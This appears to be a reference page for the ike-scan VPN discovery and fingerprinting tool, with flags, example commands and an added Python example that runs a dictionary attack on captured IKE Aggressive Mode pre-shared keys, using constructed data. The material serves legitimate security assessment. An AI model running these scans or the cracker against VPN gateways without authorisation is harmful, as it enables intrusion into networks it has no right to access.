ike-scan
Discover and fingerprint IKE hosts (IPsec VPN Servers). Uses retransmission backoff pattern for implementation identification.
Description
ike-scan discovers IKE hosts and can also fingerprint them using the retransmission backoff pattern. It performs discovery by identifying hosts that respond to IKE requests and fingerprinting by analyzing response packet timing against known patterns.
The tool accepts targets as single IP addresses, hostnames, networks in CIDR notation (192.168.1.0/24), and IP ranges (192.168.1.3-192.168.1.27). It speaks IKEv1 in both Main Mode and Aggressive Mode and has experimental IKEv2 support (--ikev2). Additional features include saving Aggressive Mode parameters for offline PSK cracking with the companion psk-crack tool, and a range of protocol manipulation options (transforms, vendor IDs, header fields) for testing how a VPN server responds to unusual proposals.
Common use cases include network reconnaissance to identify IPsec VPN endpoints, vendor fingerprinting of IKE implementations, and aggressive mode PSK vulnerability assessment.
How It Works
ike-scan sends IKE Phase 1 request packets (UDP port 500 by default, 4500 when --nat-t is used) to each target and treats an IKE reply as evidence of an IKE host. Fingerprinting relies on retransmission backoff: because ike-scan never continues the handshake, a responder retransmits its reply on an implementation-specific schedule, and ike-scan records the intervals between those retransmissions (--showbackoff) and matches the timing sequence against the vendor patterns in /usr/share/ike-scan/ike-backoff-patterns. Only hosts that answered in the first place can be fingerprinted this way, and a host that does not retransmit yields no pattern. For PSK cracking, an Aggressive Mode (-A) responder's first reply already carries its nonce, Diffie-Hellman public value, identity and HASH_R, a keyed hash derived from the pre-shared key; --pskcrack (-P) writes those parameters out, and psk-crack recomputes HASH_R offline for each candidate key using the RFC 2409 SKEYID construction (HMAC-MD5 or HMAC-SHA1, whichever hash was negotiated) or Nortel's proprietary variant. Once the parameters are captured, no further traffic to the VPN server is needed, which is why a single Aggressive Mode exchange is enough to expose a weak PSK to a dictionary attack.
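The offline step described above, as an added worked example (this is illustrative code written for this page, not the ike-scan project's own code or psk-crack's source): it parses one parameter line in the colon-separated hex form that ike-scan's --pskcrack output uses (field order g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r), picks the PRF from the HASH_R length the way psk-crack does, and recomputes HASH_R per RFC 2409 for each candidate key. The responder parameters are constructed deterministically for the demonstration and are not a real capture.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Field order of one line written by "ike-scan -A --pskcrack=<file>" and read
# by psk-crack; every value is hex-encoded and the fields are colon-separated.
PSK_FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def parse_psk_line(line: str) -> dict:
    """Split one psk-crack parameter line into raw byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(PSK_FIELDS):
        raise ValueError(f"expected {len(PSK_FIELDS)} fields, got {len(parts)}")
    return {name: bytes.fromhex(value) for name, value in zip(PSK_FIELDS, parts)}


def prf_name(params: dict) -> str:
    """Choose the negotiated PRF from the HASH_R length (16 = MD5, 20 = SHA1)."""
    size = len(params["hash_r"])
    if size == hashlib.md5().digest_size:
        return "md5"
    if size == hashlib.sha1().digest_size:
        return "sha1"
    raise ValueError(f"unsupported HASH_R length {size}")


def hash_r_for_psk(params: dict, psk: bytes, prf: str) -> bytes:
    """RFC 2409: SKEYID = prf(pre-shared-key, Ni_b | Nr_b) for PSK authentication,
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), prf = HMAC."""
    skeyid = hmac.new(psk, params["ni_b"] + params["nr_b"], prf).digest()
    material = (params["g_xr"] + params["g_xi"] + params["cky_r"] + params["cky_i"]
                + params["sai_b"] + params["idir_b"])
    return hmac.new(skeyid, material, prf).digest()


def crack_psk(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Dictionary attack: return the first candidate whose HASH_R matches, else None."""
    params = parse_psk_line(line)
    prf = prf_name(params)
    for candidate in candidates:
        computed = hash_r_for_psk(params, candidate.encode(), prf)
        if hmac.compare_digest(computed, params["hash_r"]):
            return candidate
    return None


def constructed_psk_line(psk: str, prf: str = "sha1", seed: bytes = b"ike-scan-example") -> str:
    """Build a CONSTRUCTED parameter line for a responder that knows `psk`.
    All values are derived from `seed` so the example is reproducible offline;
    nothing here is a real capture."""
    def fill(label: str, n: int) -> bytes:
        return hashlib.shake_256(seed + label.encode()).digest(n)

    params = {
        "g_xr": fill("g_xr", 128),   # DH group 2 public values are 1024 bits
        "g_xi": fill("g_xi", 128),
        "cky_r": fill("cky_r", 8),   # ISAKMP cookies are 8 bytes
        "cky_i": fill("cky_i", 8),
        "sai_b": fill("sai_b", 40),  # stand-in for the initiator SA payload body
        "idir_b": b"\x01\x00\x00\x00" + bytes([203, 0, 113, 10]),  # ID_IPV4_ADDR 203.0.113.10
        "ni_b": fill("ni_b", 20),
        "nr_b": fill("nr_b", 20),
    }
    params["hash_r"] = hash_r_for_psk(params, psk.encode(), prf)
    return ":".join(params[name].hex() for name in PSK_FIELDS)


if __name__ == "__main__":
    line = constructed_psk_line("s3cretVPN")
    print(crack_psk(line, ["password", "vpn", "s3cretVPN"]))  # s3cretVPN
```

The real workflow is `ike-scan -A --pskcrack=psk-params.txt <target>` followed by `psk-crack --dictionary=<wordlist> psk-params.txt`; the point of the example is that every candidate costs two HMACs and zero packets, so a PSK that survives only because the gateway rate-limits logins does not survive Aggressive Mode.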
Installation
sudo apt install ike-scan
Flags
-h, --help  Show usage information.
-A, --aggressive  Use IKEv1 Aggressive Mode instead of the default Main Mode.
-P, --pskcrack[=<file>]  Save Aggressive Mode PSK parameters for psk-crack (to stdout if no file is given); requires -A. The optional filename must be attached (--pskcrack=file), not passed as a separate argument.
-o, --showbackoff[=<n>]  Record the retransmission backoff pattern and report the matching implementation.
--nat-t  Use RFC 3947 NAT-Traversal encapsulation; source and destination ports default to 4500.
-s, --sport=<port>  UDP source port (default 500).
-f, --file=<file>  Read targets from a file, one per line.
-v, --verbose  Increase verbosity (may be repeated).
-2, --ikev2  Use IKEv2 (experimental).
Examples
Show usage:
ike-scan -h
Discover IKE hosts on a network (Main Mode):
ike-scan 192.168.1.0/24
Probe an IP range in Aggressive Mode:
ike-scan -A 192.168.1.3-192.168.1.27
Capture Aggressive Mode PSK parameters for offline cracking (the filename is attached to the option, and -A is required):
ike-scan -A --pskcrack=psk-params.txt example.com
Fingerprint the implementation from its retransmission backoff pattern:
ike-scan --showbackoff target-ip
Probe with NAT-Traversal encapsulation on UDP 4500:
ike-scan --nat-t --sport=4500 target
Scan targets listed in a file, with verbose output:
ike-scan --file=hosts.txt -v